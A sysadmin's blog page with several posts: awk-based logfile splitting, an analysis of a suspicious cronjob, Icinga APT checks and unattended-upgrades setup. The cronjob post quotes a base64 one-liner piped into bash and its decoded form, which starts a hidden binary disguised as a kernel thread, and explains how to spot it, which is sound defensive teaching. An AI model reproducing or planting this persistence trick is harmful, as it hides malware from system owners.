Feuerfest

Just the private blog of a Linux sysadmin

Howto properly split all logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS based AdBlocking in my home network. Additionally I installed Unbound as recursive DNS resolver on it. Meaning: I can use the RaspberryPi in my network at home as the DNS server for all my devices. This way I don't have to use the DNS-Servers of my ISP granting me some additionally privacy. Additionally I can see which DNS queries are sent by each device. Leading to surprising revelations.

However recently my internet connection was interrupted and afterwards I noticed that I couldn't access any site or services where I used a domain or hostname to connect to. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was fixed easily with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabyte in size. Whoops. That happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen option which is a good idea to trigger after the logrotate. This way Unbound properly closes old filehandles and uses the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}

But wait, there is more

However I had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work conveniently with it. 49.184.687 lines are just too much. Especially on a RaspberryPi with the, in comparison, limited CPU power. Now I could have just split it up after n lines using split -l number-of-lines but that is:

  • Too easy and
  • Did I encounter the need for a script which splits logfile lines based on a range of timestamps more often in the recent time

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines will have the Unix timestamp in brackets, followed by the process name, the log level the message belongs too and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However some multi-line message wont follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will however also show an awk command on how to filter based on the timestamps, useful for logfiles where every line is prefix with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds as date automatically takes 00:00:00 for these values. Automatically giving us the first second of a day. And date also takes care of leap years and possible a lot of other nuisances when it comes to time and date calculations.

To get the last second of a month we simply take the first day of the month, add a month and subtract one second. It can't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599

To verify the value we can use this for-loop. It will give us all the date and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets we need to tell awk to treat either [ or ] as a field separator. Then we can use awk to check if the second field is in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to only output the Unix timestamp.

And as the logfile starts in November 2023 I set the values accordingly. awk then conveniently puts all lines whose timestamp is between these to values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 =< MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log

And this would already work fine, if every line would start with the timestamp. As this is not the case we need to add a bit more logic.

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Export variables so the grep in the sub-shells have this value
      export FIRST_SECOND
      export LAST_SECOND

      # Split logfiles solely based on timestamps
      awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' unbound.log >> "unbound-$YEAR-$MONTH.log"

      # Creating all those separate logfiles will probably fill up our diskspace
      #  therefore we gzip them immediately afterwards
      "$GZIP" "/var/log/unbound/unbound-$YEAR-$MONTH.log"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh.. Yeah, I had a fallacy here. As still wouldn't have worked with multi-line logmessages without a timestamp. Also using grep like this is highly inefficient. While it would be fine for a one-time usage script I still hit a road block.

I just wasn't able to get awk to do what I wanted and I resorted to asking my question on StackOverflow. Better to get the input from others then wasting a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to calculate the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched exactly the line-numbers per month. Even multi-line log messages and empty lines were included.

All I then did was adding gzip to compress the files directly before the next file is created. Just to prevent filling up the disk completely. Additionally I change the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, the logfile name won't work with logrotate. But I just need it to properly dig through the files and the Year-Month naming will be of great help here. Afterwards I don't need them anymore and will delete them. So this was none of my concern.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    if (prev) system("gzip " prev)
    close(prev)
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) system("gzip " prev)
}' unbound.log

No bash script with convoluted logic needed. And easily useable for other logfiles too. Just adopt the starting regular expression to match the one the logfile uses and adopt the logic for strftime so the proper timestamp can be created.

Sometimes it's better to ask other people. 😄

Comments

Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone on the Internet asked on Reddit what this CronJob does, as it looked strange.

{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64. Are very common method to - sort of - hide malicious contents
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge as the |base64 -d|bash; part clearly states that the base64-string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbusdata -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

With these commands do is explained fairly simple. pkill checks (the -0 parameter) if a process named gs-dbus is already running under the user ID 1004. If a process is found pkill exits with 0 and everything after the || (logical OR) is not executed.

The right part of the OR is only executed when pkill exits with a 1 as no process named gs-dbus is found. On the right part there are a few environment variables and parameters being set and the process is started via the /home/admin/www/gs-dbus binary and then renamed into [kcached].

And while this explains what is logically happening. It still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started, if it isn't already running and claimed it being probably safe. Why this person came to this conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again this person oversaw some critical pieces of information.

And this made me taking my time to write this little blogpost about how to approach such situations.

As there are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software.

  1. Base64 encoded hashes which get executed via bash are almost never doing anything good
  2. If that software really belongs to Gnome you have Systemd unit-Files or Timers. Or if that is a system without Systemd: You got good old init. But then again there would, most likely, be some kind of Gnome sub-process started by Gnome itself and not some obfuscated CronJob
  3. Renaming the processname to [kcached] makes it look like a kernel level thread. If there is an equivalent to "World biggest warning sign" this is it.
  4. The binary being started is /home/admin/www/gs-dbus. You notice www as being the folder where the binary is stored? Yeah, this is always an indicator that files in that folder are reachable via a Webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application and this was the entry point for the malicious software & CronJob.

As what the person missed is: Processes in square brackets are always kernel level threads, running as root and have a Parent Process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to look like a kernel level thread. Obviously to feint the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further or even kill that process when some scanning software reports a kernel level thread? Well, the obvious answer is: Of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Lets take a look at the following ps output from one of my Debian systems. I make it quick & dirty and simply grep for all processes with a [ in it.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes not having a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd] who acutally owns PID 2 and got started by PPID 0, second is my grep command and two others are from the sshd but only the [kthreadd] is actually enclosed in square brackets as it doesn't contain any commandline.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452 and running under the username admin. Nothing that matches the behaviour of a kernel level thread. And this should raise all red flags your mind possesses.

And this is why basics are so important. Do not just assume a software is doing nothing bad as "There is some piece of legitimate software out there on the Internet sharing the same name.". Anyone can lie. And the bad people most likely are.

Comments

How to monitor your APT-repositories with Icinga

Photo by Pixabay: https://www.pexels.com/photo/software-engineers-working-on-computers-256219/

During my series about unattended-upgrades (Part 1, Part 2) I noticed that a Debian Mirror I use was unresponsive for 22 days but I had nothing to notify me of this. As this also meant that unattended-upgrades didn't apply any patches I wanted a check for this which in turn will trigger unattended-upgrades when there are outstanding updates.

The problem

The monitoring-plugins provide the check_apt plugin. This is normally used to check for available packages. However, in the default configuration it doesn't execute an apt-get update as this requires root privileges. Personally I think the risk is worth the gain. As adding the -u parameter will execute an apt-get update and therefore check_apt will notify you when apt-get update finishes with a non-zero exit-code.

Take the following problem:

root@host:~# apt-get update
Hit:1 http://security.debian.org/debian-security bookworm-security InRelease
Hit:2 http://debian.tu-bs.de/debian bookworm InRelease
Get:3 http://debian.tu-bs.de/debian bookworm-updates InRelease [55.4 kB]
Reading package lists... Done
E: Release file for http://debian.tu-bs.de/debian/dists/bookworm-updates/InRelease is expired (invalid since 16d 0h 59min 33s). Updates for this repository will not be applied.

A mere check_apt wont notify you of any problems:

root@host:~# /usr/lib/nagios/plugins/check_apt
APT CRITICAL: 12 packages available for upgrade (12 critical updates). |available_upgrades=12;;;0 critical_updates=12;;;0

Making this go undetected.

Executed with the -u parameter however, we are notified of the problem:

root@host:~# /usr/lib/nagios/plugins/check_apt -u
'/usr/bin/apt-get -q update' exited with non-zero status.
APT CRITICAL: 12 packages available for upgrade (12 critical updates).  warnings detected, errors detected.|available_upgrades=12;;;0 critical_updates=12;;;0

The solution

Fixing this via Icinga is however a bit more complicated, as the standard apt CheckCommand from the Icinga Template Library (ITL) doesn't include the -u option and isn't prefixed to use sudo despite root privileges being needed. This can be checked here: https://github.com/Icinga/icinga2/blob/master/itl/command-plugins.conf#L2155 or in your local /usr/share/icinga2/include/command-icinga.conf if you happen to use Icinga.

The root cause is also the number one main problem I have with the check_apt CheckPlugin. check_apt is designed to actually install package updates when check_apt reports outstanding available updates. This however breaks the number one paradigm I have regarding monitoring systems: They should not modify the system on their own. And when they do, they should do it in the same way as it is normally done. check_apt breaks this.

Maybe that person should have read a blog article about unattended-upgrades prior to writting that plugin? 😜

Normally you utilize Event Commands for that type of scenario: "If service X is in state Y execute event command Z."

The CheckCommand check_apt_update

Therefore I recommend creating your own apt_update CheckCommand and using that.

object CheckCommand "check_apt_update" {
        command = [ "/usr/bin/sudo", + PluginDir + "/check_apt" ]

        arguments = {
                "-u" = {
                        description = "Perform an apt-get update"
                }
        }
}

Defining the service and configuring the EventCommand

Then in your service definition add a suitable event_command:

apply Service "apt repositories" to Host {
  import "hourly-service"

  check_command = "check_apt_update"

  enable_event_handler = true
  // Execute unattended-upgrades automatically if service goes critical
  event_command = "execute_unattended_upgrades"
  // For services which should be executed ON the host itself
  command_endpoint = host.vars.agent_endpoint

  assign where host.vars.distribution == "Debian"

}

Creating the EventCommand

And create the EventCommand like this:

object EventCommand "execute_unattended_upgrades" {
  command = "sudo /usr/bin/unattended-upgrades"
}

Necessary sudo rights

This requires a sudo config file for the icinga user executing that command. And the commands must be executable without the need for a TTY, hence we end up with the following:

root@host:~# cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

Conclusion

This is now sufficient as I'm notified when something prevents APT from properly updating the package lists. APT itself takes care to validate the various entries inside the Release file and exits with a non-zero exit-code, so there is no need to put that logic inside of check_apt.

Setting up similar checks for other monitoring systems is of course also possible. In general raising an alarm when apt-get update throws an non-zero exit-code is a somewhat foolproof method.

Comments

Using and configuring unattended-upgrades under Debian Bookworm - Part 2: Practise

Photo by Markus Winkler: https://www.pexels.com/photo/the-word-update-is-spelled-out-in-scrabble-tiles-18524143/

Preface

At the time of this writing Debian Bookworm is the stable release of Debian. It utilizes Systemd timers for all automation tasks such as the updating of the package lists and execution of the actual apt-get upgrade. Therefore we won't need to configure APT-Parameters in files like /etc/apt/apt.conf.d/02periodic. In fact some of these files don't even exist on my systems. Keep that in mind if you read this article along with others, who might do things differently - or for older/newer releases of Debian.

Part 1 where I talk about the basics and prerequisites of unattended-upgrades along with many questions you should have answered prior using it is here: Using and configuring unattended-upgrades under Debian Bookworm - Part 1: Preparations

Note: As it took me considerably longer than expected to write this post please ignore discrepances in timestamps and versions.

Installing unattended-upgrades - however it's (most likely) not active yet

Enough with theory, let's switch to the shell. The installation is rather easy, a simple apt-get install unattended-upgrades is enough. However if you run the installation in an interactive way like this unattended-upgrades isn't configured to run automatically. The file /etc/apt/apt.conf.d/20auto-upgrades is missing. So check if it is present!

Note: That's one reason why you want to set the environment variable export DEBIAN_FRONTEND=noninteractive prior to the installation in your Ansible Playbooks/Puppet Manifest/Runbooks/Scripts, etc. or execute an dpkg-reconfigure -f noninteractive unattended-upgrades after the installation. Of course placing the file also solves the problem.😉

If you want to re-configure unattended-upgrades manually execute: dpkg-reconfigure unattended-upgrades and select yes at the prompt. But I advise you not just do it right yet.

root@host:~# apt-get install unattended-upgrades
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  gir1.2-glib-2.0 libgirepository-1.0-1 python3-dbus python3-distro-info python3-gi
Suggested packages:
  python-dbus-doc bsd-mailx default-mta | mail-transport-agent needrestart powermgmt-base
The following NEW packages will be installed:
  gir1.2-glib-2.0 libgirepository-1.0-1 python3-dbus python3-distro-info python3-gi unattended-upgrades
0 upgraded, 6 newly installed, 0 to remove and 50 not upgraded.
Need to get 645 kB of archives.
After this operation, 2,544 kB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://debian.tu-bs.de/debian bookworm/main amd64 libgirepository-1.0-1 amd64 1.74.0-3 [101 kB]
Get:2 http://debian.tu-bs.de/debian bookworm/main amd64 gir1.2-glib-2.0 amd64 1.74.0-3 [159 kB]
Get:3 http://debian.tu-bs.de/debian bookworm/main amd64 python3-dbus amd64 1.3.2-4+b1 [95.1 kB]
Get:4 http://debian.tu-bs.de/debian bookworm/main amd64 python3-distro-info all 1.5+deb12u1 [6,772 B]
Get:5 http://debian.tu-bs.de/debian bookworm/main amd64 python3-gi amd64 3.42.2-3+b1 [219 kB]
Get:6 http://debian.tu-bs.de/debian bookworm/main amd64 unattended-upgrades all 2.9.1+nmu3 [63.3 kB]
Fetched 645 kB in 0s (1,618 kB/s)
Preconfiguring packages ...
Selecting previously unselected package libgirepository-1.0-1:amd64.
(Reading database ... 33397 files and directories currently installed.)
Preparing to unpack .../0-libgirepository-1.0-1_1.74.0-3_amd64.deb ...
Unpacking libgirepository-1.0-1:amd64 (1.74.0-3) ...
Selecting previously unselected package gir1.2-glib-2.0:amd64.
Preparing to unpack .../1-gir1.2-glib-2.0_1.74.0-3_amd64.deb ...
Unpacking gir1.2-glib-2.0:amd64 (1.74.0-3) ...
Selecting previously unselected package python3-dbus.
Preparing to unpack .../2-python3-dbus_1.3.2-4+b1_amd64.deb ...
Unpacking python3-dbus (1.3.2-4+b1) ...
Selecting previously unselected package python3-distro-info.
Preparing to unpack .../3-python3-distro-info_1.5+deb12u1_all.deb ...
Unpacking python3-distro-info (1.5+deb12u1) ...
Selecting previously unselected package python3-gi.
Preparing to unpack .../4-python3-gi_3.42.2-3+b1_amd64.deb ...
Unpacking python3-gi (3.42.2-3+b1) ...
Selecting previously unselected package unattended-upgrades.
Preparing to unpack .../5-unattended-upgrades_2.9.1+nmu3_all.deb ...
Unpacking unattended-upgrades (2.9.1+nmu3) ...
Setting up python3-dbus (1.3.2-4+b1) ...
Setting up libgirepository-1.0-1:amd64 (1.74.0-3) ...
Setting up python3-distro-info (1.5+deb12u1) ...
Setting up unattended-upgrades (2.9.1+nmu3) ...

Creating config file /etc/apt/apt.conf.d/50unattended-upgrades with new version
Created symlink /etc/systemd/system/multi-user.target.wants/unattended-upgrades.service → /lib/systemd/system/unattended-upgrades.service.
Synchronizing state of unattended-upgrades.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable unattended-upgrades
Setting up gir1.2-glib-2.0:amd64 (1.74.0-3) ...
Setting up python3-gi (3.42.2-3+b1) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for libc-bin (2.36-9+deb12u3) ...
root@host:~# 

After the installation we have a new Systemd service called unattended-upgrades.service however, if you think that stopping this service will disable unattended-upgrades you are mistaken. This unit-file solely exists to check if an unattended-upgrades run is in progress and ensure it isn't killed mid-process, for example, during a shutdown.

To disable unattended-upgrades we need to change the values in /etc/apt/apt.conf.d/20auto-upgrades to zero. But as written above: This file currently isn't present in our system yet.

root@host:~# ls -lach /etc/apt/apt.conf.d/20auto-upgrades
ls: cannot access '/etc/apt/apt.conf.d/20auto-upgrades': No such file or directory

However, as we want to have a look at the internals first, we do not fix this yet. Instead, let us have a look at the relevant Systemd unit and timer-files.

The Systemd unit and timer files unattended-upgrades relies upon

An systemctl list-timers --all will show you all in-/active timer files on our system along with the unit-file which is triggered by the timer. On every Debian system utilizing Systemd you will most likely have the following unit and timers files per-default. Even when unattended-upgrades is not installed.

root@host:~# systemctl list-timers --all
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Sat 2024-10-26 00:00:00 CEST 15min left    Fri 2024-10-25 00:00:00 CEST 23h ago      dpkg-db-backup.timer         dpkg-db-backup.service
